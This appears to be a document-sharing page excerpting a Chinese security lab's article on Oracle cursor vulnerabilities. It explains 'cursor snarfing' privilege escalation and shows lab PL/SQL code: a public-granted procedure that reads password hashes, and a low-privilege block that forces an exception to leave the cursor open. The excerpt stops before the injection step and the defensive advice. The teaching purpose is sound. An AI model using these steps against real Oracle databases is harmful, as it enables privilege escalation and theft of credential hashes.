欢迎来到天天文库
浏览记录
ID:34725110
大小:166.48 KB
页数:9页
时间:2019-03-10
《oracle数据库游标中的安全隐患及防护建议》由会员上传分享,免费在线阅读,更多相关内容在工程资料-天天文库。
1、Oracle数据库游标中的安全隐患及防护建议一.引言SQL是面向集合的语言,其结果一般是集合量(含多条记录),而pl/sql的变量是标量,一组变量一次只能存放一条记录。很多时候查询结果的记录数是不确定的,无法提前声明足够的变量。于是引入了游标的概念,游标使得数据库操作更灵活,但同时也给黑客入侵数据库带来了机会。安华金和数据库安全实验室(DBSecLabs)基于游标的应用原理,本文讨论游标可能带来什么安全隐患以及如何应对这些安全隐患。二.游标的分类oracle数据库游标是Pl/sql执行DQL、DML等语
2、句的时候,oracle在内存中为其结果集分配一个缓冲区。游标是指向该区的一个指针、命名一个工作区或是一种结构化数据类型。它为应用程序提供了一种对结果集中每一行数据单独处理的方法。oracle游标基本可以分为以下3类:显式游标、隐式游标和动态游标(关系具体看下图)。-9-©2016www.dbsec.cn游标的核心功能在于,从表中检索出结果集,每次指向一条记录,与客户端或应用程序进行交互,因此游标是设计嵌入式SQL语句的应用程序的常用编程方式。随着游标的广泛使用,其本身的安全隐患也变得越来越突出。一.游标
3、带来的安全隐患oracle游标给数据库带来的安全隐患主要分为三大类:1.1缺乏异常处理,挂起的游标被恶意利用游标将数据库中相应的信息存入内存块中,当用户打开游标的时候,可以直接访问游标指向的内存块中存放的信息,而无需再访问基表获得数据。如果一个高权限用户建立一个游标却没关闭该游标,低权限用户就有可能获得游标中存储的关键信息,或向打开的游标中注入恶意语句,进行高权限运行,达到提权或越权访问的目的。这就是游标SNARF提权的基础。游标不正常关闭基本是人为造成的,高权限用户忘记关闭,或者游标所在的子程序缺乏异
4、常处理机制。如果没有做相应的异常处理,黑客很有可能制造异常,使游标被一直挂起,利用未关闭的游标,注入恶意代码。再利用游标自身的高权限执行恶意代码,进行越权或者非法提权操作。下面试验用例由安华金和数据库安全实验室提供:SQL>connect/assysdba已连接。SQL>CREATEORREPLACEPROCEDUREschina_test(P_USERVARCHAR)IS2CURSOR_NAMEINTEGER;3PASSWORDVARCHAR2(30);4IINTEGER;5BEGIN6CURSOR_
5、NAME:=DBMS_SQL.OPEN_CURSOR;7DBMS_OUTPUT.PUT_LINE('CURSOR:'
6、
7、CURSOR_NAME);8DBMS_SQL.PARSE(CURSOR_NAME,'SELECTPASSWORDFROM9SYS.DBA_USERSWHEREUSERNAME=:schina',dbms_sql.native);-9-©2016www.dbsec.cn10DBMS_SQL.BIND_VARIABLE(CURSOR_NAME,:schina',P_USER);11DBMS
8、_SQL.DEFINE_COLUMN(CURSOR_NAME,1,PASSWORD,30);12I:=DBMS_SQL.EXECUTE(CURSOR_NAME);13IFPASSWORD='01234567890ABCDEF'THEN14DBMS_OUTPUT.PUT_LINE('YOURPASSWORDHASHISNOTOK');15ELSE16DBMS_OUTPUT.PUT_LINE('YOURPASSWORDHASHISOK');17ENDIF;18DBMS_SQL.CLOSE_CURSOR(CU
9、RSOR_NAME);19END;20/PL/SQL过程已成功完成。SQL>grantexecuteonschina_testtopublic;授权成功。schina_test是一个缺乏异常处理代码的存储过程,它的作用是对给定用户找到其密码hash值,然后和固定HASH值进行比较并返回结果。open_cursor打开游标直到close_cursor或SQL会话终止游标退出。由于缺乏异常代码机制,用任意低权限账号执行这个存储过程,可以触发异常挂起游标。SQL>connectscott/tiger已连接。S
10、QL>setserveroutputonSQL>declare2xvarchar(40000);3iinteger;4begin5froiin1..10000loop6x:='b'
11、
12、x;7endloop;8sys.schina_test(x);9end;-9-©2016www.dbsec.cn10/CURSOR3241423通过向p_user中输入一个过长的x,系统返回ORA-01460错误。由于存储过程schina_test中没有对异常
此文档下载收益归作者所有